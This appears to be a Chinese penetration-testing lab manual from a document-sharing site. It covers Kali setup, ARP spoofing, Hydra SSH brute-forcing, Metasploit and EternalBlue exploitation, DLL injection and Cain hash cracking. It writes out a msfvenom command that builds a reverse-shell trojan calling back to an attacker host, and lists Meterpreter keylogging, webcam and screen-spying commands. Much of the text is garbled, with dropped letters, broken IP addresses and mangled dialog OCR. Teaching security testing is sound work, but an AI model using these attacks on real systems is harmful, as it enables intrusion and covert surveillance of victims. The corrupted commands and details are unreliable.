版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
ARP欺骗实例ai中利用Arspoof工具进行ARP攻击ARPARPARPWnscdIPWnsifigIP126888.15,12.8.82igigaliigig12.81882确认网络状态后我们来构造ARP攻击命令,我们在终端内输入:arpspoof-ieth0-t1218.8.5iettaliWnsigig新浪至此我们通过arpspoof工具造成了目标主机的网络断网的实验就完成了。arsofRPali/ocy/et/i4/i_oadi_rwdIPec1"/y/etiv4/i_”1IP开启IPaliasf工具aliARPARPARPtl+CAPalirsof-iet0-t928.8818ali会向Wno(2.8.8835)发送P响应包,告诉Wns目标主机1218.8.8WnosalialiWnosigigww.sna..cWnosaliwesarkwesk令搜索框内输入:i.r1926818.1||i.192168.8.35。这样可以获取目标Wnosalitl+CRPARsfARP欺骗的示例就讲解完成了。alirsofARPai的基本配置kalikalikalirootip->安装中文输入法->编译内核->ssh一、设置root用户第一次登录用户身份后,输入命令:sudopasswdrootroot(root然后输入命令:surootrootroot二、配置静态ipip:servicenetworkingstop,将网络vim/etc/network/interfaces iautoeth0ifaceeth0inetstaticaddress39netmaskgateway在修改完成后按“esc”键退出编辑模式,再输入“:wq!”,回车后强制保存文件,并退出vim然后输入命令:servicenetworkingstart重新开启网络服务最后输入命令:ifconfig 查看网络情况,发现静态IP已配置完成三、更新软件kali是一个滚动式更新的系统,各种软件都一直在更新,所以时常会用到更新安装软件的命令。输入命令:sudoaptupdate 系统将从源中下载最新的软件安装包,然后输入命令:sudoaptupgrade系统会打开这些最新的软件安装包,并将软件安装在系统中。最后输入命令:sudoaptclean将旧的安装包删除,清理内存空间。ps:四、配置更新源kali的源配置文件在/etc/apt/sources.list文件中,输入命令:suvim/etc/apt/sources.listvimikali"Additional"这一行vim以下为国内常用的几个源:#中科大deb /kali kali-rolling main non-freecontribdeb-src/kalikali-rollingmainnon-freecontrib#阿里云deb /kali kali-rolling main non-freecontribdeb-src/kalikali-rollingmainnon-freecontrib#清华大学deb /kali kali-rolling maincontribnon-freedeb-src/kalikali-rollingmaincontribnon-free#浙大deb/kalikali-rollingmaincontribnon-freedeb-src/kalikali-rollingmaincontribnon-free五、设定屏幕锁定时间kalikaliupgrade六、ssh设置sshunix符界面的远程登录管理,他默认的使用的端口是22号,采用密文的形eneshkalilinuxsshroot我们在本实验中通过设置ssh实现远程登录kalilinuxrootrootsurootrootrootdetcsshs-ddsudogedit/etc/ssh/sshd_configconfigPriRooLoginye将PasworAuhncaonyes(3)随后点击右上角“保存”shecnt.d/sshretar(5)接着输入lsof-i:22以查看是否监听查看SHecin.d/sshstau7将sshudaerc.dshenble七、拍摄快照:aliae-八、其他命令及系统优化1Kai在终端中执行uname-r命令,查看当前系统的内核版本2、查看内核文件apt-cachesearchlinux-headersp-gelynx-hedes-$(nae)3sudoapt-getautoclean2、sudoapt-getclean3uoap-geuoeove4、sudonautilus/boot以上就是本次kali基本配置的全部内容。ai的基本应用KaliKali别:通用命令、操作命令、读取编辑命令和权限命令。一、通用命令获取详细信息Uname,通过这个命令获取系统规格的详细信息显示工作目录的名称pwdKaliLinux查看文件内容及存储目录ls(文件)的简便方法。ls-l查看历史记录命令history打印文本echo命令是将任何文本打印到您将其定向到的位置。我们在终端中输入echo命令,然后输入shenzhen,这就完成了在新文件中打印复制的文本。echo[guangdong]将复制的文本打印到现有文件。如果使用’‘echo查看文件信息我们创建文件后,可以在终端中输入catshenzhen命令来查看文件信息,cat命令主要是查看文件内容。清除终端内信息clearKaliKali二、操作命令在系统中创建目录我们在终端中输入mkdirtest名称,我们就可以在系统中创建一个目录。mkdir更改当前目录cdKalichangedirectorycdcdtest,回车后我们就进入了test目录。接着输入cd..命令,回车后我们就返回了上级目录如果输入cd/命令,回车后就返回了根目录。复制文件或目录Kalicpcpcp-u-vtest1test2test1test2cp-itest1test2itest1test2,test2cp-rbeijingguangzhoubeijingguangzhou,这条命令主要是用于复制目录(包含目录中的文件)。在目录之间移动文件cpmv,mvWindowslsapplebeijingmvapple/beijing回车后,继续输入cdbeijing命令,进入到beijing这个目录,我们输入ls命令,可以看到在beijing目录下我们刚才移动的apple文件。mv命令也可以对文件进行更改文件名称的操作,我们在终端中输入,mvapplelsapplecatrmrmcat回车后我们lscat三、读取编辑命令more,moreapple.txt,我们可以使用Bviviapple.txtcatviESCwq,回车后就把我们编辑的文件进行了保存。四、权限命令Kalichmod命令(changemode的缩写)用于管理文件和目录权限,并确定谁可以访问它们。为了更好地理解chmodLinuxLinux3(r),写(w)和执行(x)权限。这些权限ls看到当前目录下的文件,这些文件分别被赋予了不同权限。如果我们想要修改apple.txt这个文件的访问或修改权限可以使用chmod命令,我们在终端输入sudochmodxapple.txtlsapple.txt这个文件的加入的执行权限是否修改成功。chmodrootsoduKali五、常用测试工具下面我们介绍一些Kali下一些常用的测试工具。我们主要介绍的工具包括:NETCAT、HYDRA和Crunch工具。NETCATNC,在网络安全界被称为“瑞士军刀”,用来在两台机器TCP/UDPKalincNetcatHTTPTCPTCP/GETGET/HTTP/1.0HTTPNetcat还可以用来做端口扫描,用来发现一些机器上开放的端口。我们在终端中输入:nc-zvlocalhost-l22命令,其中-z参数表示使用Zero-I/O参数用来显示网络连接中的详细输出信息。根据输出信息可以看出,2222NC:nc-l22nc.txtnetcat成功连接到该端口,netcat会发送文件内容。我们接着在终端中输入:nc2822>nc.txt当连接成功后,本地主机会发送文件内容到28NCHydra下面我们来继续介绍Kali系统的另外一个工具Hydra,它是著名黑客组织thcssh-Luser.txt-Ppass.txt-t2-vV-ens30ssh大写user.txt.-Ppass.txt,-ensssh可以看到破解成功,30的ssh密码为root。hydrasshftp、pop3Kali:cd/use/share/wordlists,我们进lsCrunch字典生成工具crunch。打开终端输入:suroot,输入密码后输入crunch346789>>pass1.txt,这个命令的含义是生成由三位数和四位数生成的字典,且都有6789数字组成,最后生成到到桌面pass1.txt文件。Kali虚拟机的安装kali镜像的下载Kali Linux 的下载地址 installer-images,下载界面如示。3264ISO64ISOKaliLinux安装至MwaeorksttinVMware Workstation16.0,官方下载地址/cn/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/16_0。本小节将介绍在VMwareWorkstation上安装KaliLinux操作系统。启动VMwareWorkstation,将显示如图1所示的界面。1.4安Kali 11.VMwreWorkstation16在该界面单击“创建新的虚拟机”图标,将显示如图2所示的界面。图2新建虚拟机向导31.4安Kali 2界面。
图3安装客户机操作系统3 1.4安Kali 3图4选择客户机操作系统LinuxLinux5.X4图5命名虚拟机51.4安Kali 4图6指定磁盘容量6 1.4安Kali 5图7已准备好创建虚拟机该界面显示了所创建虚拟机的详细信息,此时就可以创建操作系统了。然后单击“完成”按钮,将显示如图7所示的界面。图8创建虚拟机KaliLinux。KaliLinuxVMwareWorkstation81.4安Kali 6图9虚拟机设置KaliLinux安装的磁盘空间的最小值是8GB。为了便于使用,这里推荐至少25GB去保存附加程序和文件。内存最好为512MB以上。1.4安Kali 7图10虚拟机设置在该界面选择“CD/DVD(IDE)”ISOKaliLinux8在图8界面,选择“开启此虚拟机”命令。图11启动界面该界面是Kali的引导界面,在该界面选择安装方式。这里选择GraphicalInstall(图形界面安装)1.4安Kali 8图12选择语言1.4安Kali 9在该界面选择安装系统的默认语言为Chinese(Simplified)图13选择您的区域在该界面选择区域为“中国”,然后单击“继续”按钮1.4安Kali 101.4安Kali 11图14配置键盘在该界面选择键盘模式为“汉语”,然后单击“继续”按钮图15配置网络该界面用来设置系统的主机名,这里使用默认的主机名Kali(用户也可以输入自己系统的名字。然后单击“继续”按钮12图16设置普通用户用户名在该界面设置普通用户用户名,然后单击“继续”按钮13图17设置普通用户用户名在该界面设置普通用户用户名,然后单击“继续”按钮14图18设置普通用户密码在该界面设置普通用户密码,然后单击“继续”按钮,15图19磁盘分区16图20磁盘分区17图21已选择要分区该界面要求选择分区方案,默认提供了三种方案。这里选择(推荐新手使用18图22磁盘分区19图23磁盘分区在该界面选择“是”复选框,然后单击“继续”按钮。20图24安装系统现在就开始安装系统了。在安装过程中需要设置一些信息。21图25软件选择在该界面将GNOME复选框选中,然后单击“继续”按钮。22图26图形界面选择在该界面将选择图形化界面,Lightdm为默认选项,我们选择在上一步软件选择的GNOME也就是gdm3,然后单击“继续”按钮。23图27安装GRUB启动引导器GRUB24图28安装GRUB启动引导器GRUB25图28安装完成安装完成,点击继续重新启动即可进入系统。26图29登录系统在该界面选择登录用户,此时无法登录root用户,选择在安装过程中设置的普通用户user。图30登录系统在该界面输入密码登录系统。27图31系统桌面该界面为kali的系统桌面。图31更改root密码由于此时登录账号为普通用户,需要通过命令对root账号28进行密码更改。点击“终端”图标,在终端中输入命令:sudopasswdroot。在回显中依次输入普通账号的密码、设置的root用户的密码、确认root用的密码。当回显已成功更新密码时,证明root用户密码修改成功图32更改用户在终端中输入命令:sudoroot输入密码后发现终端用户名变更为root,证明root用户密码修改成功。29Matesploit的基本使用(1)Metaplit一、Metasploit的启动Metasplit图.etaslit1然后在下拉菜单中点击漏洞利用工具集,然后在弹出的右侧菜单中点击MetasplitFramewok输入当前用户名口令。
图.etaslit2图.etaslit3Metasplit。图.etaslit4msfcosole图.etasploit的启动-1回车后,程序就开始启动了。图.etaslit2expoits,多少个paylads图.etaslit二、Metasploit的帮助我们在终端中输入:helphelpmsfmsfCoreComands核心命令;ModuleCommands模块命令;JobComands后台任务命令;ReourceSriptCommnds资源脚本命令;DatabseBacendComands数据库后端命令;CredntialsBackendComands证书/DevelperCommandshelp图.etsplot核心命令CoreCommands:图.模块命令ModuleCommand:图.后台任务命令JobCommand:图.资源脚本命令ResourceScritComands:图0.数据库后端命令DatabaseackendCommands:图1.证书/凭证后端命令CredetialsBacendCommand:图2.证书开发人员命令Developerommand:图3.三、Metasploit的常用命令connect命令核心命令中的connect命令,connect命令主要用于远程连接主机。一般用于内网渗透。IP输入比较常用的命令:conect580图4ip5IP80conect80命令后直接回车。图5.getgetshow
图6showall,encodrs,nop,explits,pyload,auxiiary,post,plugins,inf,optionsmeasplitexpoits。showexplots图7.shwxploismeasplit图8.shwxploisjiego结果showpayloads图9.shwaladsmeasplit图0.shwaladsshowauxiiary图1.shwaxiliarymeasplit图2.shwaxiliaysearch命令当我们使用msfconsole的时候,会用到各种漏洞模块、各种插件,我们可以使用search命令来搜索一些关键字信息。searchayloadwindws图3.seachaylodidows结果Widowspaylod图4.seachaylodidows结果s08_07图5.seachm0_067回车后,可以看到直接显示了漏洞相关可利用的模块。图6.seachm0_067searchms08_067rank命令。排名RankRank对漏洞利用模块进行搜索,分类以及排序。Rankexcllent漏洞利用程序绝对不会使目标服务崩溃,就像SQLgreatgood该漏洞利用程序有一个默认目标系统,并且是这种类型软件的“常见情况”(Windos7,服务器等)normal该漏洞利用程序是可靠的,但是依赖于特定的版本,并且不能或者不能可靠地自动检测。average该漏洞利用程序不可靠或者难以利用。lowmanual按路径path搜索pathmysqlath:mysql图7.seachathmql命令mysqlpltform
图8.seachathmqlpltformpatformrank在终端中输入:searchpatform:mysql图9.seachlatfrmmqlranknormaltype
图0.seachlatfrmmql结果type根据特定类型的模块进行相应的搜索,特定类型的模块包括:expoit,paylad,auxiliary,encoer,evasion,pst,ornop。在终端中输入 seachtype:eploit图1.seachypeexplot命令exploitCVE
图2.seachypeexplot结果CVECVEve:CVE2017-864图3.seachceCVE-7-64回车后就会显示相应CVE漏洞可利用的模块。图2.seachceCVE-7-64结果Metasplituse命令当使用到某个模块,就要使用到use命令,我们先查找出自己想要的ms17010seachms17010图2.ms1_010回车后找到可以用的渗透测试攻击模块。图2.ms_010结果在终端中输入:useauxiliry/scaner/smbsmbms17010命令图3.usebash图4info在终端中输入:info图51回车后就显示出这个模块的相关信息。图62信息中需要我们重点关注的内容是:1、可用目标,就是查看可以攻击哪些操作系统。2、Basicoptions:调用漏洞需要的相关参数。3、漏洞描述和执行过show终端中输入:showotios图61图62在终端中输入:showtargets图71图82showopionsRHOSS192.168.88135back
图9图0图1MetasplitMesloit的基本使用(2)easoitMatesploit的设置打开alimosleeasoitseaxilaysnerprta/cpswotos依次输入命令以设置相关策略setrhts92681815setports1-65535setthreads100settmeut0swtnsIPxlit445Metasploitseaxliaryaersbsm_m700sm1_0IPsetrhts92681815setthreads10输入swotosxlit1218.8135Wno74mfsexlitwnoss/m1_10eernalle,依次输入命令以进行相关参数的设置setrhts9268181(IP)setyladwnsx4/eretres_c)setlt1218.8.8IP)xlterer。在终端中输入background命令后,先退出当前会话。sesin1sesin的IDessis-swnenm1218.8135t.6/lsscritwnenmls命tet_saettsesis-i1meereesesis1Dortwdadd-l22r5-p338933892222命令执行完毕后我们输入netstat-anpt命令查看自身监听端口,我们发现已经监听了2222端口,这时可以通过连接2222端口,来连接目标系统的3389端口。eskp1270.1:222rootWnosalisomslemmf>mosleWnsm101(xlr6和7版本sechm1_810_8easoit4列,分别表示模块名称、公开时间、等级及描述。sem108swptnsptns这时就需要用到set命,将监听IPSVHT设置成攻击机本机IP地址。我们在终端中etrvt2.688828rnmfURLt:/:080Xi1,Exlermfessis1。easoit的MyQLMyQLMyLyQLMyQLSQLeasoitMyLalimosleeasploit的控制终端。echsl7auxilaysaners/sl_lgnuse17swtosequed为esalisraetxt和aswrtsetIP地址1218.8.8t设置完成后我们输入runyQLMyQLeasoitSQ现了相关版本信息。接着我们可以看到有一条破解成功的信息,信息中可以看到已测试出MyQLrootMyQLeasoit扫描器的使用(2)使用Nessus进行漏洞扫描Nessus安装环境:宿主主机windows7x64虚拟主机kali202264VMware:VMwareWorkstationPro16安装过程1NessusNesssNesss-104.1所示图12KaliLinuxLinux-Debianamd-64,23图2图33)下载完毕后找到在本机种的安装包,如图4所示图44)将下载的安装包直接拉进VM的kali中,如图5所示图55)右键选择Nessus的安装包,选择‘在这里打开终端,如图6所示图66)‘ls图77)suroot8图88)dpki//bin/sstemctltartnessusd.serie9图99)右键点击红框中的连接,并选择‘打开链接’,如图10所示图1010)AdvancdAccepttheRiskandCntine图1111)NessusEssntias,12Conti图1212Emai13图1313)输入验证码,并点击进入下一步,如图14所示图1414)Nessus:admin:roo5图1515)等待插件安装完成,由于网络问题可能会失败,多尝试几次,如图16所示1617
图16图1717)安装完成后,设置服务开机自启动。sstemctltartnessud.sricesstemctleablnessud.serie18图18Nessus扫描Windos主机1)indos7ip19218.88132)登录https//270.0.1884 用户:admin密码root,如图19所图193)NewScan20图204)选择AdvancedScan21图215)在name中输入扫描名称,此处设置扫描名称为adv-scan2dedescrptiontaretsipindos7ip192168.188.15 plugins6)填写完毕后点击保存,如图22所示7)点击Lunch进行本地扫描
图22图238)扫描任务执行完成后,显示如图24所示的界面图249)在该界面双击扫描任务名称adv-scan1,将显示扫描的详细信息,如图25所示图2510)从该界面可以看到总共扫描了一台主机。11)ulnerbilty26图2612)HostIP13)192168.88.357图2714)INFO28图2815NessusNessus、PDF、HTML、CSVNessusDB。16)单击Eport按钮,选择导出文件的格式,可选择的格式包含Nssus和NessusDB,如图29所示图2917)ReportPDFHTM、30图3018PDF31图31扫描网络漏洞1)BasiNetorkScan32图322)nameNetorkScanttaretsipindos7ip192168.188.1533图333)Pluins34CICO 扫描CICO系统DNS DNSultUixActs FTP FTPiwls 扫描理火墙Ginasellemely 扫描程的hellGel 扫描用服务Newe eer--erFleSaring licyCmlance 扫描CIS和CAP信息SCADA MTPolems 扫描MTP问题SNMP SNMPerveeectnetigs 图344)点击Lunch进行网络漏洞扫描,如图35所示5)查看扫描结果,如图36所示
图35图366)从改界面可以看出漏洞信息,如图37、图38所示图37图38扫描器的使用(1)-Nmap扫描器的使用Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网(这是亦称fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。其基本功能有四个:主机发现(HostDiscovery)TCP/ICMP端口扫描(PortScanning)枚举目标主机上的开放端口。版本侦测(VersionDetection)询问远程设备上的网络服务以确定应用程序名称和版本号。操作系统侦测(OperatingSystemDetection)确定网络设备的操作系统和硬件特性。主机发现在终端模拟器输入surootrootroot,root-sPping-sP参数主要是用于使用ping的方法进行主机探测,扫描/24网段,得出可响应的主机列表,在列表中可以看到网段内开放的主机有256台。如图1所示nmap-sP/24网段图1-P0ping)PingNmapP0NmpIP1225、1102nmap-PO12图2-PS[portlist](TCPSYNPing)NmapIP-PS这个参数来进行域名探测。通过-PSSYNTCPup25801104433nmap-PS图3-PU[portlist](UDPPing)-PUUDPupdown。-Ps4Nmap-Pn-PU图4端口扫描nmapIPopen(开放的),filtered(被过滤的),closedOpenTCP连接或者UDP报文。Closed(关闭的):由于包过滤阻止探测报文到达端口,nmapFilteredUnfiltered(Nmap无法确定它们是关闭还是开放。Open/Filtered:端口被过滤或者是开放的,NmapClosed/Filtered:端口被过滤或者是关闭的,Nmap常见服务对应端口号如下:服务端口号HTTP80HTTPS443Telnet23FTP21SSH(安全登录)、SCP(文件传输)、端口重定向22SMTP25POP3110WebLogic7001TOMCAT8080WIN2003远程登录3389Oracle数据库1521MSSQL*SEVER数据库sever1433MySQL数据库sever3306-sS(TCPSYN在本实验中,使用-sS进行全端口扫描,可以看到IP地址为12TCP251105Nmap-sS12图5使用的参数SSTCPSYN扫描,被称为半开放扫描。因为它不打开一个完全的TCP连接,通常我们会完成针对特定端口或某个区间范围的端口扫描任务。-P使用-P-vNmap本实验中对目标主机的1-30端口进行扫描,可以看到IP地址为121302225Nmap6nmap-sS-p1-30-v12图6版本侦测在一些漏洞公告或新闻中会明确一个漏洞所影响的应用程序在n-map中通过使用相应参数来进行目标主机版本探测,可以获得相应信息,可以知道正在运行的服务类型以及他们的版本。-sV (版本探测) 该控制选项打开nmap的版本探测功能。可以看出12开放的端口有22、25等端口,提供了相关服务以及服务的版本号,如图7所示nmap-sV12图7也可以用 -A 选项同时打开操作系统探测和版本探测,来查看目标主机的操作系统版本。可以看到本实验中,目标主机的操作系统为Linux2.4.20 ,如图8所示。nmap-sV12-A图81)设置版本扫描的强度--version-intensity<强度值>(设置版本扫描强度)nmap进行版本扫描(即使用-sV选项)时,nmap发送一系列探测报文,每个报文都被赋予一个1到9之间的值。被赋予较低值强度值参数说明了应该使用哪些探测报文。数值越高,扫描强度值必须在0和9。9图9操作系统侦测最后我们来介绍一下利用N-map对目标主机的操作系统侦测。网络安全扫描的过程,识别操作系统也是获取漏洞存在TCP/IPfingerprinting指纹扫描,这种技术对操作系统的探测非常有效。Nmap发送一系列TCP和UDP报文到远程主机,检查响应中的每一个比特。在进行一打测试如TCPISN,TCP采样,和初始窗口大小检查之后,Nmap把结果和数据库nmap-os-fingerprints中超过1500个已知的操作系统的fingerprints启用操作系统检测rootsu-OIP07linux10图10-O-AIP07Linux11nmap-O-A07图11--osscan-guessNmapNmapNmap默认会进行这种匹配,得出结果后可通过其他方式进行验证,可以提高对不确定目标的探测并使得Nmap的推测更加有效。本实验中可以看到目标主机的操作系统版本为2.4.20。如图12所示。nmap-O--osscan-guess07图12Windows防火墙IPsec配置IPSec(Internet协议安全)是一个工业标准网络安全协议,为IP网络通TCP/IPSecIPIPSec结合密码保护服务、安全协议组和动态密钥管理三者来实现上述两个目标,不仅能为企业局域网与拨号用户、域、网站、远程站点以及Extranet之间的通信提供强有力且灵活的保护,而且还能用来筛选特定数据流。IPSecIPSec。下面我们来创建一个基于Windows防火墙的IPSec隧道的安全连接规则。WindowsIPSecITWindowsIPIPIP我们进行下一步,我们可以选择或者自定义相应的协议及端口,我们选择TCP1445,IPSec隧道规则应用到哪个网络,然后点击下一步。最后我们给这个隧道起个名字叫IPSec合规则类型的类型o
新建连接安全规则向导 匮暹步票:规则类型佬追类型要求佬迈终结点身份验汪方法文件名称
你要创建的连接安全规则的类型O偏离O限制基千身份验证条件的连,接如1或成员身份或健座状态o0免踩身份验证凶来自特定计算机的连接不进行身份验证oO赈务妥到脤务妥(fil对指定计算机之间的连接进行身份验证o@痉迳CD对两台计算机之间的连接进行身份验证oO自定义C自定义规则oo若要隧道类型指定要创建的难通类o步黎规则类型
新建连接安全规则向导你希望创建什么类型的阻遍?@自定义程翌(吩
<上一ciI(!!))I 取J步自匡'步自隐逜类型要求愤姐终结点验证方法喊配赞文件名称
指定燧追终结点以及可以在燧道的任意湍连接的计算机oO_)格本地计算机用作一个终结点o指定远程燧通终结点以及司以通过燧通连接的计算机仑O网关到客户湍(z)-io指定远程客户湍算是盓要免棕此燧道的受IPsec护的连?曰Y)。啤IPSeo保连接酝喊括包o否(Q.。通过饶道发送与该连接安全规则匹酘的所里o<LI步<n>>I—取消詹要求·
新建连接安全规则向导 匡置步黎:规则类型燧通类型要求点口件名称
进行身份验证的时间O入站和出站连接要求身份验证但)入站和出站连接都必须通过身份验证才允许o要求对入站连接进行身份验不要为出站连接建立痉遍@o@不进行身份验证@所有连接不进行身份验证o<上一步石门1下一步<!!>>I取消勹命隧道终结点rrs..go
新建连接安全规则向导方法终结点方法终结点1谝口终结点2谝口正 445 任何型巴
斜昴橇月讨猖结点2之间的连技格通过指定的隐遍终结·佬结点- IP地址 1:1指定秀匹配的IP地址终结豆1中的计算机(1)求隧道终结点口文件名称
终结点溫近终结点1)IP.4地址(P)
心I!目揖(E肿JJ,ic(Rl滇fjj(I,
釭IP地址或子网心l例128.2192.16810/2420029心b1心1420074fff,6,4J20029d3b1心14274££f.390/112O此IP地址范围(BJ从®·卢箭帮t,tlifi!£IPv6地址卢箭帮t,tlifi!£j设赞”达憔愿ij设赞”达点谒撞近终结点2)IP.4地址(4)IP心地址(6)
到(!):O心默认网关ii(T'
二 肖(上一(B) 下一(N)> 取消詹协议和端口指定此规则应用的o
新建连接安全规则向导 匡瞿步黎:规则类型燧逌类型要求陪迈终结点协议和端口百港文件名称配器文件文件步黎:规则类型型要求结点和湍口.配赞文件名称
?协议类(f_): "协(: l终结点1端口特定湍口 寸|烟 |示例:80,445,5000---50I0结点2口所有湍口 寸示例:80,445,5000---50I0<上步ll下一(!!))I 取消新即至接安全规则向导 匡置何时应用该规?回归CDJ计算机连接到其企业因时应用o已专用CPl计算机连接到专用网络位巨l公用CU)计算机连接到公用网络位赞时应用o(步(!!)> 取消IPSecIPSecWindowsWindowsIPSecIPSec设置。在这个页面中我们可以看到有三个配置选项,IPSecIPSecIPSecIPSecIPSec择相关算法的内容。在一般情况下我们默认选择列表中较高位置的方法就可以了。我们还可以定义密钥生存时间和会话数量来控制密钥的使用范围。我们接下来介绍一下数据保护,我们依次点击数据保护设置的“高级”和“自IPSecKerberosV5,KerberosV5协议可验证请求身份验证的用户标识V5V5IPSecIPSecInternet控制消息协议(ICMP)IPSecWindowsIPSecICMP,若要确保允许ICMP数据包通过Windows防火墙,还必须创建并启用入站规则。IPSecIPSecWindowsIPSecWindows进程注入大体上,进程注入可以分为两种形式:DLLShellcodeshellcodedllloadlibrary下面我们来演示一个DLL注入的过程。这里我们借助一个“InjectDLL”的工具,实现一个对于百度拼音输入法进程的注入,在注入成功后会弹出对话框,内容是“DLL已进入目标进程。”1、启动任务管理器点击开始➡选择运行,如下图所示:在弹出的对话框中,输入“taskmgr”,如下图所示:打开任务管理器后,找到“baidupinyin.exe*32”进程,如下图示:2、打开注入工具打开“InjectDLL-V1.0”文件夹,打开其中的“ProcessInject”可执行文件。如图:工具界面如下:3、开始注入打开注入工具后,首先点击“选择进程”下拉框,在下拉框中找到“baidupinyin.exe”进程并点击选择。DLL“Dll1在注入方式菜单下,选择“远程线程注入”,点击注入按钮。如上图所示,注入成功。4、注入结果查看在这里我们使用一个新的工具来查看我们对“baidupinyin.exe*32”进程注入的效果,工具名称“ProcessExplorer”。“procexp64点击“View”,在下拉菜单中选择“LowerPaneView”,点击“DLLS”。在图中窗口上部分找到“baidupinyin.exe”进程并单击,在窗口下部分就可以看到我们注入的dll文件,如图中所示。WindowsWindows系统下Cain工具的使用Cain工具集成了多种功能,包括网络攻击、密码破解、嗅探和分析等。它支持多种破解技术,如字典攻击、暴力破解、蛮力破解等。Cain还具有强大的工具还支持多种密码哈希算法和加密算法,可以处理各种类型的密码,包括WindowsFTPZIPRARPDFCainCain今天我们主要介绍下使用Cain工具破译md5密文的方法。1、生成密文md5md5按图中所示,输入密文“123”,选择“32位大”,点击“加密”按钮,得到所需的密文。2、破解密文CainCracker,MD5Hashes,在右侧空白处左键点击一下。按图中依次操作,点击“+”,输入我们刚得到的密文,点击“ok”按钮。MD5Attack”(暴力破解)在弹出的对话框中点击start,开始破解。图中所示,我们得到了原文为:123此工具还有很多其他功能,今天我们就演示一个MD5密文破解功能,其他功能我们在后面实验中在进行演示,更多功能同学们也可以在课下自己动手实验。Windows系统中使用Cain软件实现帐户审计CainCain&Oxid.itMicrosoftCainVOIP今天我们利用Cain工具中的破解功能来实现Windows账户的密码审计工作。Windows操作系统把用户名和密码的哈希值存放在SAMAccountManageWindowsSyskey(系统密钥)加密保护。WindowsLMHashesNTLMHashesLMHashesWindowsXP或WindowsServer2003等系统发行版本以及以下采用的加密方式(基本已经被淘汰了),NTLMHashes在WindowsVista与WindowsServer2008下面我们来看看再Cain软件中如何操作。CainCracker,LM&NTLMHashes,在弹出的对话框中,选择从本地系统导入哈希值(ImportHashesfromlocalsystem),Next。从图中我们可以看到,红圈1中显示所用用户LM密码列均为空,因为我们使用的是win7系统,在win7系统里LM加密方式已被弃用。红圈2中显示AdministratorguestNTLM3test8(Brute-Force再选择NTLMHashes。在弹出的对话框中点击Start。图中红圈处显示破解的密码,点击Exit。Windows帐户审计WindowsWindowsWindowsWindowsWindows以系统管理员身份登录进系统,点击“开始”按钮,再打开“控制面板”。点击“系统和安全”。点击“管理工具”双击打开“本地安全策略”。先点击“本地策略”,再点击“审核策略”。在右侧窗口中,双击“审核帐户管理”,在弹出的窗口中,选中“成功”、“失败”,确定。按上一节的方法,进入“控制面板”,点击“用户帐户和家庭安全”。点击“添加或删除用户帐户”点击“创建一个新帐户”“test此时我们可以在“管理帐户”界面看到新创建的“test”标准帐户。在打开的窗口中找到“事件查看器”并双击打开。Windowstest使用msfvenom生成反弹木马Shell木马实例当我们需要往目标主机上传木马文件时,我们就可以利用msfvenomMetersploitshell,最终控制目标主机。ifconfigIPIP8IP35在kali中启动msfsurootrootrootrootmsfconsolemsfvenom1、 先查找使用的具体语句进入程序后为了更准确的编写攻击语句可以先进入msf中利 用 search 进 行 搜 索 具 体 的 使 用 语 句(payload/windows/meterpreter/reverse_tcpx86的windows机器,如需要攻击x64windows机器可以利用payload/windows/x64/meterpreter/reverse_tcp)在终端处输入searchmeterpreter/reverse_tcp,在返回的结果中可以看到结果11是本次实验所需要的攻击语句2、 利用生成一个反弹shell的木马msfvenom:back.exeshellWindowsshell28:4444metersploitmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=28LPORT=4444-fexe-oback.exeppyopayload.-f是生成的后门的格式,-o是输出文件名,LHOSTIP,LPORTshellback.exemsfconsolemataspolit3、 设置监听选项利用multi/handler进行监听来自受害者35的反弹过来的shell,分别输入命令useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST28setLPORT44444、 查看监听状态showoptions5、 开启监听在命令端中接着输入run以开启监听6、 在受害主机上运行将生成的back.exe移至受害主机,并在受害主机点击运行back.exe7.查看监听情况可以看到msf监听连接成功并创建meterpreter会话8.meterpreter简单系统命令查看受害主机用户getuid查看受害主机进程在终端处输入ps命令来获取目标主机上正在运行的进程信息查看受害主机系统信息在终端处输入sysinfo以查看受害主机系统信息,可以看到受害主机是一台系统为window7的主机对目标主机进行截图在终端处输入 screenshot 可以看到截图保存在/home/admin123文件夹下查看截图新打开一个终端,并在终端下输入ls查看截图是否存在查看受害主机画面在终端处输入runvnc可以远程实时监控目标机的画面常用命令getuid查看当前权限getsystem尝试获取system权限shellshell按名称终止进程kill按PID终止进程reboot重启shutdown关机upload上传文件(格式参考:upload/root/1.txtd:/)download下载文件(格式参考:downloadc:/1.txt/root/)keyboard_send令对方键盘输入(参考格式:keyboard_sendilovecc)#请按以下顺序执行keyscan_start开始捕获击键(开始键盘记录)keyscan_dump转储按键缓冲(下载键盘记录)keyscan_stop停止捕获击键(停止键盘记录)#操作完都会有文件保存在服务器,一般是存在/rootmsfrecord_mic麦克风录制(格式参考:record_micd13)screenshot截图截取对方目前桌面的截图webcam_snap摄像头拍摄一张照片webcam_stream持续监控摄像头缓冲区溢出实例-永恒之蓝实例分析实验环境准备使用aliidsPaliig通实验:、airoro。、aiipiigip为.wids7wi+dicgi。ip为.、ipaiaiscsleaif、sf6>serchs_0(s_0ai)、4aiiry/scaer/s//s0为、exlitwids/s/70etrnlle输入eexlit/ids/sm/s__eeralle、setaldwids/x/e
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 九年级化学下册 第7章 应用广泛的酸、碱、盐 基础实验8 酸与碱的化学性质教案 (新版)沪教版
- 高中语文 第一单元 第1课《三国演义》-曹操献刀教案 新人教版选修中国小说欣赏
- 2024秋四年级英语上册 Unit 4 My home课时3 Let's spell教案 人教PEP
